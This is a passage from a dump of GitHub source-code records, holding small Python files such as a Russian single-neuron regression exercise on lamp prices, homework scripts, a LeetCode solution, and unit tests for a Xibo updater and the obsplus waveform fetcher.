Лм\r\n- Длина, мм\r\n- Диаметр, мм\r\n- Срок службы, ч\r\n- Цветовая температура, К\r\n- Стоимость единицы, руб.\r\nP.S. Цветопередачу не стал брать, ибо значение почти везде одно и то же\r\n\"\"\"\r\n\r\nvalues = np.hstack((data_frame.values[2:, 4:7], data_frame.values[2:, 8:11]))\r\n# Нормализуем данные по столбцам, используя библиотеку sklearn:\r\nlearn_array = preprocessing.normalize(values, axis=0, norm='max')\r\n# Желаемый результат:\r\noutput_values = data_frame.values[2:, 3:4].flatten()\r\n\r\n\r\n# Производим \"обучение\" нейрона по имеющимся данным:\r\nw = np.zeros(len(learn_array[0]))\r\n\r\nalfa = 0.2\r\nbetta = -0.4\r\n\r\n\r\ndef f(x):\r\n s = betta + np.sum(x @ w)\r\n return s\r\n\r\n\r\ndef train():\r\n global w\r\n w_copy = w.copy()\r\n for x, y in zip(learn_array, output_values):\r\n w += alfa * (y - f(x)) * x\r\n return (w != w_copy).any()\r\n\r\n\r\nwhile train():\r\n pass\r\n\r\n\r\nfor i in range(len(learn_array)):\r\n if i == 0:\r\n print(\"Желаемое значение -> полученное значение: расхождение значений (в %)\")\r\n r = round(f(learn_array[i]), 3)\r\n a = output_values[i]\r\n d = round(abs(a - r)*100/max(r, a), 2)\r\n print(f'{a} -> {r}: {d}%')\r\n\r\n\"\"\"\r\nЖелаемое значение -> полученное значение: расхождение значений (в %)\r\n15 -> 13.920: 7.2%\r\n11 -> 11.769: 6.53%\r\n20 -> 17.953: 10.24%\r\n7 -> 7.085: 1.2%\r\n15 -> 15.108: 0.71%\r\n7 -> 6.267: 10.47%\r\n13 -> 13.404: 3.01%\r\n11 -> 10.780: 2.0%\r\n13 -> 14.723: 11.7%\r\n20 -> 18.207: 8.96%\r\n5 -> 5.896: 15.2%\r\n10 -> 10.667: 6.25%\r\n8 -> 8.762: 8.7%\r\n12 -> 12.288: 2.34%\r\n10 -> 8.912: 10.88%\r\n8 -> 6.061: 24.24%\r\n12 -> 12.667: 5.27%\r\n20 -> 20.006: 0.03%\r\n15 -> 14.844: 1.04%\r\n13 -> 12.011: 7.61%\r\n13 -> 13.332: 2.49%\r\n5 -> 5.933: 15.73%\r\n8 -> 7.543: 5.71%\r\n8 -> 7.544: 5.7%\r\n20 -> 19.850: 0.75%\r\n15 -> 13.255: 11.63%\r\n15 -> 16.032: 6.44%\r\n\"\"\"\r\n\r\n\r\n# Протестируем наш нейрон, используя новые данные:\r\ndata_test = pd.ExcelFile(\"data_test.xlsx\")\r\ndata_test_parse = data_test.parse('Лист1')\r\ndata_test_frame = pd.DataFrame(data_test_parse)\r\n\r\nvalues_test = np.hstack((data_test_frame.values[2:, 4:7], data_test_frame.values[2:, 8:11]))\r\ntest_array = preprocessing.normalize(values_test, axis=0, norm='max')\r\noutput_values_test = data_test_frame.values[2:, 3:4].flatten()\r\n\r\nfor i in range(len(test_array)):\r\n if i == 0:\r\n print(\"Желаемое значение -> полученное значение: расхождение значений (в %)\")\r\n r = round(f(test_array[i]), 3)\r\n a = output_values_test[i]\r\n d = round(abs(a - r)*100/max(r, a), 2)\r\n print(f'{a} -> {r}: {d}%')\r\n\r\n\"\"\"\r\nЖелаемое значение -> полученное значение: расхождение значений (в %)\r\n11 -> 15.595: 29.46%\r\n7 -> 8.731: 19.83%\r\n12 -> 18.678: 35.75%\r\n10 -> 14.562: 31.33%\r\n15 -> 18.972: 20.94%\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\nВЫВОД: \r\nПо началу, когда нейрон \"обучали\", получалось не слишком большое расхождение по сравнению с тестируемыми \r\nданными. Причины таких больших расхождений: \r\n- недостаточное количество данных (для реальной картины нужны данные хотя \r\n бы по 10-15 позиций на каждую мощность); \r\n- недостоверные данные в одном из показателе - цене (в связи с тем, \r\n что сейчас в самом разгаре \"черная пятница\", цены на некоторые позиции могут значительно снижать);\r\n- отсутствие какой-либо корреляции (зависимости) между характеристиками продукта;\r\n- недостаточное количество характеристик продукта (в нашем случае использованы только 6 характеристик \r\n продукта, по факту, их гораздо больше (вес, производитель, напряжение, вид, тип колбы, форма, \r\n эквивалент лампы накаливания, угол рассеивания и пр.)\r\n\"\"\"\r\n","repo_name":"Alekssanderson/Python_AAT22-1","sub_path":"class_5/class_5.py","file_name":"class_5.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12708723207","text":"from config import config\nfrom character import characters\nfrom damaging import damagers\nfrom boundingbox import bounding_boxes\nfrom boundingboxsystem import overlaps\n\n'''Place containables in character inventory upon collision.'''\n\n\ndef update_character_damager_collisions(lapsed_milliseconds: int):\n for char_entity in characters.keys():\n # iterate over containables that are on the map\n for damaging_entity in damagers.keys():\n if overlaps(\n bounding_boxes[char_entity],\n bounding_boxes[damaging_entity]\n ):\n # deal damage to the character\n\n characters[char_entity].health = max(\n 0,\n characters[char_entity].health\n - (lapsed_milliseconds * damagers[damaging_entity].damage_per_ms)\n )\n","repo_name":"MattEttler/worlds-above","sub_path":"python3/systems/characterdamagingcollisionsystem.py","file_name":"characterdamagingcollisionsystem.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4878996522","text":"import sys\n\ndef reconstruction(k_strings):\n\trecon = []\n\t\n\tfor element in k_strings:\n\t\trecon.append(element[0])\n\n\tpat = k_strings[len(k_strings) - 1]\n\trecon.append(pat[1:])\n\trecon = \"\".join(str(x) for x in recon)\n\treturn recon\n\ndef stringSpelledGapPat(first,second,k,d):\n\tprefix = reconstruction(first)\n\tsuffix = reconstruction(second)\n\n\tfor i in range(k+d+1, len(prefix)):\n\t\tif prefix[i] != suffix[i-k-d]:\n\t\t\treturn \"No string!\"\n\treturn prefix + suffix[len(suffix) - k-d:]\n\n\nfilename = sys.argv[1]\n\npatternA = []\npatternB = []\nwith open(filename) as file:\n\tfor line in file:\n\t\ttoAdd = line.split('|')[0]\n\t\ttoAdd2 = line.split('|')[1].rstrip()\n\t\t\n\t\tpatternA.append(toAdd)\n\t\tpatternB.append(toAdd2)\n\nresult = stringSpelledGapPat(patternA, patternB,50,200)\nprint(\"\".join(str(x) for x in result))","repo_name":"j2moreno/Beng-181","sub_path":"reconGapped.py","file_name":"reconGapped.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"20899727474","text":"class Matrix:\n def __init__(self, data):\n self.elements = data\n self.n_rows = len(data)\n self.n_columns = len(data[0])\n\n def add(self, other_matrix):\n result = []\n\n for row in range(self.n_rows):\n new_row = []\n\n for col in range(self.n_columns):\n result_sum = self.elements[row][col] + other_matrix.elements[row][col]\n new_row.append(result_sum)\n\n result.append(new_row)\n\n return result\n","repo_name":"zsvizi/modelling-courses","sub_path":"courses/dynamical_models/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30777692529","text":"\"\"\"\r\nTianyi Li\r\nClass: CS 521 - Summer 2\r\nDate: 10 August 2021\r\nHomework Problem # 4\r\nDescription of Problem : Prompt for a file name of text words.\\\r\nWords can be on many lines with multiple words per line.\r\n\"\"\" \r\nimport string\r\n\r\n# The text file must be in the same file path as the main program.\r\ndef list_to_once_words(lst):\r\n \"\"\"\r\n This function will return the words that appear twice in the list.\r\n\r\n :param list:\r\n :return new_list: new list with words that appeared twice in list.\r\n \"\"\"\r\n new_list = []\r\n\r\n for char in list:\r\n if list.count(char) == 2 and char not in new_list:\r\n new_list.append(char)\r\n return new_list\r\n\r\nfile_name = input(\"Please enter the file name: \")\r\n\r\ntry:\r\n f1 = open(file_name, 'r')\r\n text = f1.read().strip()\r\n new_content = ''.join([i for i in text if i not in string.punctuation])\r\n f1.close()\r\n \r\n list = new_content.split()\r\n result = list_to_once_words(list)\r\n\r\n print(result,\"These words appeared twice in the file.\")\r\n\r\nexcept FileNotFoundError as e:\r\n print(e)\r\n","repo_name":"skyfall823/Python-Homework","sub_path":"Assignment_5/lit_hw_5_8_4.py","file_name":"lit_hw_5_8_4.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26043114896","text":"import os\n\nimport yaml\n\nfrom block_extractor.block_extractor_psl_v2 import BlockExtractorPSLV2\nfrom cell_classifier.psl_cell_classifier import PSLCellClassifier\nfrom data_loader.load_majid_data import LoadCell2VecData\n\n\ndef main(config):\n data_loader = LoadCell2VecData(config['jl_path'])\n data_loader.load_data_from_sheet('/Users/informationist/Projects/src/github.com/abhinav-kumar-thakur/table-understanding/files/AMIS_Data.xls', config)\n\n sheet_list = data_loader.tables\n\n result_path = os.path.join(config[\"model_path\"], config[\"dataset\"])\n model_path = os.path.join(result_path, config[\"c2v\"][\"cell_classifier_model_file\"] + '0' + \".model\")\n cell_classifier = PSLCellClassifier(model_path, config)\n c2v_tags = cell_classifier.classify_cells_all_tables(sheet_list)\n\n be_model_file = os.path.join(result_path, config[\"c2v\"][\"block_extractor_model_file\"] + '0' + \".model\")\n extractor = BlockExtractorPSLV2(be_model_file, config, beta=0.01, lmd=10)\n sheet_with_blocks = extractor.extract_blocks_all_tables(sheet_list, c2v_tags)\n\n for count, sheet in enumerate(sheet_with_blocks):\n print('--------------------------------------------------------------')\n print(count)\n print('--------------------------------------------------------------')\n for i, blk in enumerate(sheet):\n print(i, blk)\n\n\nif __name__ == \"__main__\":\n with open('./cfg/test_config.yaml') as ymlfile:\n c = yaml.load(ymlfile)\n\n main(c)\n","repo_name":"abhinav-kumar-thakur/table-understanding","sub_path":"pipeline_final.py","file_name":"pipeline_final.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33374161140","text":"#!/usr/bin/python3\ndef list_division(my_list_1, my_list_2, list_length):\n try:\n res = [i / j for i, j in zip(my_list_1, my_list_2)]\n except ZeroDivisionError:\n print(\"division by 0\")\n #return result\n except (TypeError, ValueError):\n print(\"wrong type\")\n except IndexError:\n print(\"out of range\")\n finally:\n print(res)\n return res\n","repo_name":"AishaKhalfan/alx-higher_level_programming","sub_path":"0x05-python-exceptions/4-division.py","file_name":"4-division.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"32953523147","text":"from pprint import pprint\n\nn = int(input())\ndata = []\nkey = 3\nfor _ in range(n-2):\n row = list(map(int, input().split()))\n row.append(key)\n row.append(max(row[1:-1]))\n\n data.append(row)\n key += 1\n\ndata.sort(key=lambda x: x[-1])\ning_amount = {key: None for key in range(3, n + 1)}\nprint(data)\n\nfor value in data:\n key = value[-2]\n link = value[-1]\n\n sum_A, sum_B = 0, 0\n wrong = False\n for i in value[1:-2]:\n if i == 1:\n sum_A += 1\n elif i == 2:\n sum_B += 1\n else:\n content = ing_amount.get(i, None)\n if content is None:\n wrong = True\n break\n\n sum_A += content[0]\n sum_B += content[1]\n\n if wrong:\n ing_amount[key] = None\n else:\n ing_amount[key] = sum_A, sum_B\n\npprint(ing_amount)\n\nq = int(input())\nrez = []\nfor _ in range(q):\n row = list(map(int, input().split()))\n ing_A = row[0]\n ing_B = row[1]\n key = row[2]\n content = ing_amount.get(key)\n if content is None:\n rez.append('0')\n continue\n\n if content[0] <= ing_A and content[1] <= ing_B:\n rez.append('1')\n else:\n rez.append('0')\n\nprint(''.join(rez))\n\n","repo_name":"26remph/algorithms","sub_path":"ya_intership/2022/E/E_alchemy.py","file_name":"E_alchemy.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"40775281965","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Rock Wayne \n# @Created : 2020-06-19 08:00:00\n# @Last Modified : 2020-06-19 08:00:00\n# @Mail : lostlorder@gmail.com\n# @Version : alpha-1.0\n\n\"\"\"\n# 某种外星语也使用英文小写字母,但可能顺序 order 不同。字母表的顺序(order)是一些小写字母的排列。 \n# \n# 给定一组用外星语书写的单词 words,以及其字母表的顺序 order,只有当给定的单词在这种外星语中按字典序排列时,返回 true;否则,返回 fals\n# e。 \n# \n# \n# \n# 示例 1: \n# \n# 输入:words = [\"hello\",\"leetcode\"], order = \"hlabcdefgijkmnopqrstuvwxyz\"\n# 输出:true\n# 解释:在该语言的字母表中,'h' 位于 'l' 之前,所以单词序列是按字典序排列的。 \n# \n# 示例 2: \n# \n# 输入:words = [\"word\",\"world\",\"row\"], order = \"worldabcefghijkmnpqstuvxyz\"\n# 输出:false\n# 解释:在该语言的字母表中,'d' 位于 'l' 之后,那么 words[0] > words[1],因此单词序列不是按字典序排列的。 \n# \n# 示例 3: \n# \n# 输入:words = [\"apple\",\"app\"], order = \"abcdefghijklmnopqrstuvwxyz\"\n# 输出:false\n# 解释:当前三个字符 \"app\" 匹配时,第二个字符串相对短一些,然后根据词典编纂规则 \"apple\" > \"app\",因为 'l' > '∅',其中 '∅'\n# 是空白字符,定义为比任何其他字符都小(更多信息)。\n# \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= words.length <= 100 \n# 1 <= words[i].length <= 20 \n# order.length == 26 \n# 在 words[i] 和 order 中的所有字符都是英文小写字母。 \n# \n# Related Topics 哈希表\n\n\"\"\"\n\nfrom typing import List\n\nimport pytest\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def isAlienSorted(self, words: List[str], order: str) -> bool:\n order_dict = {char: idx for idx, char in enumerate(order)}\n sorted_list = sorted(words, key=lambda x: tuple(map(order_dict.get, x)))\n return sorted_list == words\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\n@pytest.mark.parametrize(\"kw,expected\", [\n [dict(words=[\"hello\", \"leetcode\"], order=\"hlabcdefgijkmnopqrstuvwxyz\"), True],\n [dict(words=[\"word\", \"world\", \"row\"], order=\"worldabcefghijkmnpqstuvxyz\"), False],\n [dict(words=[\"apple\", \"app\"], order=\"abcdefghijklmnopqrstuvwxyz\"), False],\n])\ndef test_solutions(kw, expected):\n assert Solution().isAlienSorted(**kw) == expected\n\n\nif __name__ == '__main__':\n pytest.main([\"-q\", \"--color=yes\", \"--capture=no\", __file__])\n","repo_name":"Wang-Yann/LeetCodeMe","sub_path":"python/_0501_1000/0953_verifying-an-alien-dictionary.py","file_name":"0953_verifying-an-alien-dictionary.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7640190148","text":"\"\"\"Finding Xibo dataset IDs.\"\"\"\n\nfrom meetup2xibo.updater.xibo_api import XiboApi\nfrom meetup2xibo.updater.xibo_dataset_id_finder import XiboDatasetIdFinder\nfrom meetup2xibo.updater.exceptions import DatasetDiscoveryError\nimport json\nimport os\nimport pytest\n\n\nSAMPLE_JSON_EMPTY_LIST = json.loads(\"\"\"[]\"\"\")\n\nSAMPLE_DATASET_JSON = json.loads(\"\"\"[\n {\n \"code\": \"novalabsschedule\",\n \"dataSet\": \"Nova Labs Schedule\",\n \"dataSetId\": 456,\n \"description\": \"Meetings, classes, and events from Meetup\"\n }\n]\"\"\")\n\nSAMPLE_DATASET_JSON_TOO_MANY = json.loads(\"\"\"[\n {\n \"code\": \"novalabsschedule\",\n \"dataSet\": \"Nova Labs Schedule\",\n \"dataSetId\": 456,\n \"description\": \"Meetings, classes, and events from Meetup\"\n },\n {\n \"code\": \"novalabsschedule\",\n \"dataSet\": \"Nova Labs Schedule Experimental\",\n \"dataSetId\": 789,\n \"description\": \"Meetings, classes, and events from Meetup\"\n }\n]\"\"\")\n\n\ndef test_discover_dataset_id(mocker):\n \"\"\"Testing getting the dataset ID.\"\"\"\n xibo_api = mocker.Mock()\n xibo_api.get_datasets_by_code = mocker.Mock(return_value = SAMPLE_DATASET_JSON)\n finder = XiboDatasetIdFinder(xibo_api)\n assert finder.find_dataset_id(\"novalabsschedule\") == 456\n xibo_api.get_datasets_by_code.assert_called_once_with(\"novalabsschedule\")\n\ndef test_discover_dataset_id_none(mocker):\n \"\"\"Testing getting the dataset ID when there are none.\"\"\"\n xibo_api = mocker.Mock()\n xibo_api.get_datasets_by_code = mocker.Mock(\n return_value = SAMPLE_JSON_EMPTY_LIST)\n finder = XiboDatasetIdFinder(xibo_api)\n try:\n dataset_id = finder.find_dataset_id(\"novalabsschedule\")\n pytest.fail('Should not find dataset_id {} for code \"novalabsschedule\"'.format(str(dataset_id)))\n except DatasetDiscoveryError as err:\n assert str(err) == 'No Xibo datasets had code \"novalabsschedule\"'\n\ndef test_discover_dataset_id_too_many(mocker):\n \"\"\"Testing getting the dataset ID when there are too many.\"\"\"\n xibo_api = mocker.Mock()\n xibo_api.get_datasets_by_code = mocker.Mock(\n return_value = SAMPLE_DATASET_JSON_TOO_MANY)\n finder = XiboDatasetIdFinder(xibo_api)\n try:\n dataset_id = finder.find_dataset_id(\"novalabsschedule\")\n pytest.fail('Should not find dataset_id {} for code \"novalabsschedule\"'.format(str(dataset_id)))\n except DatasetDiscoveryError as err:\n assert str(err) == \"2 Xibo datasets had code novalabsschedule: Nova Labs Schedule (456),Nova Labs Schedule Experimental (789)\"\n\n\n\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 autoindent\n","repo_name":"jshprentz/meetup2xibo","sub_path":"tests/updater/test_xibo_dataset_id_finder.py","file_name":"test_xibo_dataset_id_finder.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"74227323972","text":"\"\"\"\ntests for the data fetcher capabilities\n\"\"\"\nimport copy\n\nimport numpy as np\nimport obspy\nimport pandas as pd\nimport pytest\nfrom obspy.core.event import Event, Origin\n\nimport obsplus\nfrom obsplus import Fetcher, WaveBank, stations_to_df, get_reference_time\nfrom obsplus.datasets.dataset import DataSet\nfrom obsplus.utils.misc import suppress_warnings, register_func\nfrom obsplus.utils.stations import df_to_inventory\nfrom obsplus.utils.testing import assert_streams_almost_equal\nfrom obsplus.utils.time import to_utc\n\nWAVEFETCHERS = []\n\n\n# ---------------------------- class level fixtures\n\n\ndef processor(st):\n \"\"\"simple processor to apply bandpass filter\"\"\"\n # mark that the processor ran\n for tr in st:\n tr.stats[\"processor_ran\"] = True\n return st\n\n\n@pytest.fixture(scope=\"session\")\n@register_func(WAVEFETCHERS)\ndef bing_fetcher():\n \"\"\"init a waveform fetcher passing a path to a directory as the arg\"\"\"\n return obsplus.load_dataset(\"bingham_test\").get_fetcher()\n\n\n@pytest.fixture(scope=\"session\")\n@register_func(WAVEFETCHERS)\ndef ta_fetcher(ta_dataset):\n \"\"\"\n Init a waveform fetcher using an active obspy client and the ta_test stations.\n \"\"\"\n return ta_dataset.get_fetcher()\n\n\n@pytest.fixture(scope=\"session\")\n@register_func(WAVEFETCHERS)\ndef subbing_fetcher_with_processor(bingham_dataset):\n \"\"\"A fetcher with a stream_processor, only use last event of bingham_test.\"\"\"\n dataset = bingham_dataset\n events = dataset.event_client.get_events()[-1]\n fetcher = Fetcher(\n waveforms=dataset.waveform_client.get_waveforms(),\n events=events,\n stations=dataset.station_client.get_stations(),\n stream_processor=processor,\n )\n return fetcher\n\n\n@pytest.fixture(scope=\"session\")\n@register_func(WAVEFETCHERS)\ndef ta_fetcher_with_processor(ta_dataset):\n \"\"\"The ta_test fetcher with a stream_processor\"\"\"\n fetcher = Fetcher(\n waveforms=ta_dataset.waveform_client.get_waveforms(),\n events=ta_dataset.event_client.get_events(),\n stations=ta_dataset.station_client.get_stations(),\n stream_processor=processor,\n )\n return fetcher\n\n\n@pytest.fixture(scope=\"class\")\ndef bing_first_time(bingham_dataset):\n \"\"\"Get a new time based on the first event in bingham_test event + 1\"\"\"\n df = obsplus.events_to_df(bingham_dataset.event_client.get_events())\n return to_utc(df.iloc[0][\"time\"])\n\n\n@pytest.fixture(scope=\"session\")\ndef ta_time_range(ta_wavebank):\n \"\"\"return a tuple of time from ta_test bank.\"\"\"\n df = ta_wavebank.read_index()\n t1 = to_utc(df[\"starttime\"].min()) + 3600\n # move to nearest hour\n start = to_utc(t1.timestamp - t1.timestamp % 3600)\n end = start + 3600 * 6\n return to_utc(start), to_utc(end)\n\n\ndef test_gather(bing_fetcher, ta_fetcher, subbing_fetcher_with_processor):\n \"\"\"Simply gather aggregated fixtures so they are marked as used.\"\"\"\n\n\n# ---------------------------------- tests\n\n\nclass TestGeneric:\n \"\"\"generic tests for wavefetchers, mostly just to make sure they run\"\"\"\n\n important_attrs = [\"yield\"]\n other_attrs = [\"time_before\", \"time_after\"]\n\n # fixtures\n @pytest.fixture(scope=\"session\", params=WAVEFETCHERS)\n def wavefetcher(self, request):\n \"\"\"Return a fetcher from a list of fetchers\"\"\"\n return request.getfixturevalue(request.param)\n\n @pytest.fixture(scope=\"session\")\n def copied_fetcher(self, wavefetcher):\n \"\"\"init a wavefetcher from a wavefetcher, return tuple of both\"\"\"\n return (wavefetcher, Fetcher(wavefetcher))\n\n # general tests\n def test_has_attrs(self, wavefetcher):\n \"\"\"test that streams for each event can be yielded\"\"\"\n assert hasattr(wavefetcher, \"yield_event_waveforms\")\n\n def test_copied_wavefetchers_get_same_data(self, copied_fetcher):\n \"\"\"ensure the two wavefetchers are equal\"\"\"\n wf1, wf2 = copied_fetcher\n inv_df = wf1.station_df\n start = inv_df.start_date.min()\n end = start + np.timedelta64(15, \"s\")\n # ensure the same data is returned\n ew1 = wf1.get_waveforms(starttime=start, endtime=end)\n ew2 = wf2.get_waveforms(starttime=start, endtime=end)\n assert ew1 == ew2\n\n def test_init_with_banks(self, bingham_dataset):\n \"\"\"Ensure the fetcher can be init'ed with all bank inputs.\"\"\"\n wbank = obsplus.WaveBank(bingham_dataset.waveform_path).update_index()\n ebank = obsplus.EventBank(bingham_dataset.event_path).update_index()\n sbank = bingham_dataset.station_client\n # ignore warnings (endtimes of inv are out of range)\n with suppress_warnings():\n fetcher = Fetcher(waveforms=wbank, events=ebank, stations=sbank)\n edf = fetcher.event_df\n sdf = fetcher.station_df\n for df in [edf, sdf]:\n assert isinstance(df, pd.DataFrame)\n assert not df.empty\n\n def test_set_stations_on_events(self, bingham_dataset, monkeypatch):\n \"\"\"Ensure station info can be obtained from events if needed.\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n monkeypatch.setattr(fetcher, \"waveform_client\", None)\n monkeypatch.setattr(fetcher, \"station_client\", None)\n fetcher.set_stations(None)\n assert not fetcher.station_df.empty\n\n def test_failed_stations_on_events(self, bingham_dataset, monkeypatch):\n \"\"\"Ensure station info can be obtained from events if needed.\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n monkeypatch.setattr(fetcher, \"waveform_client\", None)\n monkeypatch.setattr(fetcher, \"station_client\", None)\n monkeypatch.setattr(fetcher, \"event_client\", None)\n fetcher.set_stations(None)\n assert fetcher.station_df is None\n\n\nclass TestGetWaveforms:\n \"\"\"tests for getting streams from the fetcher\"\"\"\n\n duration = 10\n generic_streams = []\n\n # fixtures\n @pytest.fixture(scope=\"session\")\n @register_func(generic_streams)\n def bing_stream(self, bing_fetcher):\n \"\"\"\n Using the bing fetcher, return a data waveforms returned by get_waveforms.\n \"\"\"\n starttime = bing_fetcher.event_client.get_events()[0].origins[0].time - 2\n kwargs = dict(starttime=starttime, endtime=starttime + self.duration)\n return bing_fetcher.get_waveforms(**kwargs)\n\n @pytest.fixture(scope=\"session\")\n @register_func(generic_streams)\n def bing_stream_processed(self, subbing_fetcher_with_processor):\n \"\"\"\n Using the bing fetcher, return a data waveforms returned by get_waveforms.\n \"\"\"\n cat = subbing_fetcher_with_processor.event_client.get_events()\n starttime = cat[0].origins[0].time - 2\n fetch = subbing_fetcher_with_processor\n kwargs = dict(starttime=starttime, endtime=starttime + self.duration)\n return fetch.get_waveforms(**kwargs)\n\n @pytest.fixture(scope=\"session\")\n @register_func(generic_streams)\n def ta_stream(self, ta_fetcher):\n \"\"\"using the ta_fetcher and get_waveforms, return a data waveforms\"\"\"\n starttime = obspy.UTCDateTime(\"2007-02-20\")\n kwargs = dict(starttime=starttime, endtime=starttime + self.duration)\n try:\n return ta_fetcher.get_waveforms(**kwargs)\n except obspy.clients.fdsn.header.FDSNException:\n pytest.skip(\"failed to communicate with IRIS\")\n\n @pytest.fixture(scope=\"session\", params=generic_streams)\n def stream(self, request):\n \"\"\"\n A meta fixture for collecting all streams to perform common test on.\n \"\"\"\n return request.getfixturevalue(request.param)\n\n # general waveforms tests tests\n def test_gather(self, bing_stream, bing_stream_processed, ta_stream):\n \"\"\"Simply gather aggregated fixtures so they are marked as used.\"\"\"\n\n def test_streams_basics(self, stream):\n \"\"\"ensure a non-empty waveforms was returned\"\"\"\n assert isinstance(stream, obspy.Stream)\n assert len(stream)\n\n def test_stream_durations(self, stream):\n \"\"\"\n Ensure a waveforms of the correct length (under 2 samples)\n was returned.\n \"\"\"\n for tr in stream:\n t1 = tr.stats.starttime\n t2 = tr.stats.endtime\n duration = t2.timestamp - t1.timestamp\n diff = duration - self.duration\n assert abs(diff) < 1.5 / tr.stats.sampling_rate\n\n # specific tests\n def test_stream_processor_ran(self, bing_stream_processed):\n \"\"\"\n Ensure the waveforms returned has been run through the\n custom processing function.\n \"\"\"\n for tr in bing_stream_processed:\n assert tr.stats[\"processor_ran\"]\n\n def test_get_waveforms_no_params(self, bingham_dataset):\n \"\"\"\n Get waveforms with no params should use start_date and\n end_date in inventory.\n \"\"\"\n fetcher = bingham_dataset.get_fetcher()\n st = fetcher.get_waveforms()\n assert isinstance(st, obspy.Stream)\n\n def test_nslc_filter(self, bingham_dataset):\n \"\"\"ensure the usual getwaveforms codes can be used to filter\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n st = fetcher.get_waveforms(network=\"UU\", channel=\"*Z\")\n for tr in st:\n assert tr.stats.network == \"UU\"\n assert tr.stats.channel.endswith(\"Z\")\n\n def test_get_event_waveforms(self, subbing_fetcher_with_processor):\n \"\"\"Ensure the event waveforms can be returned.\"\"\"\n kwargs = dict(time_before=1, time_after=2)\n st_dict = subbing_fetcher_with_processor.get_event_waveforms(**kwargs)\n assert len(st_dict) == 1\n for eid, st in st_dict.items():\n assert isinstance(st, obspy.Stream)\n assert isinstance(eid, str)\n\n def test_timebefore_time_after(self, bingham_dataset):\n \"\"\"Ensure using time_before and time_after as ints works. see #168.\"\"\"\n fetcher = bingham_dataset.get_fetcher(time_before=1, time_after=10)\n for eid, st in fetcher.yield_event_waveforms():\n assert len(st)\n assert isinstance(st, obspy.Stream)\n\n\nclass TestYieldWaveforms:\n \"\"\"tests for yielding chunks of data between a time range\"\"\"\n\n duration = 10.0\n overlap = 2.0\n starttime = obspy.UTCDateTime(\"2009-04-01\")\n endtime = starttime + 60.0\n\n # helper functions\n def check_duration(self, st):\n \"\"\"ensure the durations are approximately correct\"\"\"\n for tr in st:\n duration = abs(tr.stats.endtime - tr.stats.starttime)\n tolerance = 1.5 / tr.stats.sampling_rate\n if (duration - (self.duration + self.overlap)) >= tolerance:\n return False\n return True\n\n def check_stream_processor_ran(self, st):\n \"\"\"Helper function to verify the function has run.\"\"\"\n for tr in st:\n try:\n if not tr.stats[\"processor_ran\"]:\n return False\n except (AttributeError, KeyError):\n return False\n return True\n\n # fixtures\n @pytest.fixture(scope=\"session\")\n def ta_stream(self, subbing_fetcher_with_processor):\n \"\"\"return a list of streams yielded from ta_test fetcher\"\"\"\n fet = subbing_fetcher_with_processor\n kwargs = dict(\n starttime=self.starttime,\n endtime=self.endtime,\n duration=self.duration,\n overlap=self.overlap,\n )\n return list(fet.yield_waveforms(**kwargs))\n\n # tests\n def test_durations(self, ta_stream):\n \"\"\"ensure the duration are as expected\"\"\"\n for st in ta_stream:\n assert self.check_duration(st)\n\n def test_stream_processor_ran(self, ta_stream):\n \"\"\"ensure the waveforms processor ran on each waveforms\"\"\"\n for st in ta_stream:\n for tr in st:\n assert tr.stats[\"processor_ran\"]\n\n\nclass TestYieldEventWaveforms:\n \"\"\"tests for getting waveforms that correspond to events\"\"\"\n\n time_before = 1\n time_after = 10\n duration = time_before + time_after\n overlap = 2.0\n commons = []\n\n # helper functions\n check_duration = TestYieldWaveforms.check_duration\n check_stream_processor_ran = TestYieldWaveforms.check_stream_processor_ran\n\n def check_stream_dict(self, st_dict):\n \"\"\"test waveforms dict\"\"\"\n assert isinstance(st_dict, dict) and st_dict\n for name, st in st_dict.items():\n assert isinstance(st, obspy.Stream) and len(st)\n\n # fixtures\n @pytest.fixture(scope=\"session\")\n @register_func(commons)\n def event_list_origin(self, subbing_fetcher_with_processor):\n \"\"\"\n Return a list of event waveforms, each starttime referenced\n at origin.\n \"\"\"\n func = subbing_fetcher_with_processor.yield_event_waveforms\n return dict(func(self.time_before, self.time_after))\n\n @pytest.fixture(scope=\"session\")\n @register_func(commons)\n def event_dict_p(self, subbing_fetcher_with_processor):\n \"\"\"\n Return a list of event waveforms, each starttime referenced\n at the pwave for the channel.\n \"\"\"\n # fetcher = bing_fetcher_with_processor\n func = subbing_fetcher_with_processor.yield_event_waveforms\n out = dict(func(self.time_before, self.time_after, reference=\"p\"))\n return out\n\n @pytest.fixture(scope=\"session\", params=commons)\n def stream_dict(self, request):\n \"\"\"collect all waveforms lists to apply general tests on\"\"\"\n return request.getfixturevalue(request.param)\n\n @pytest.fixture(scope=\"session\")\n def 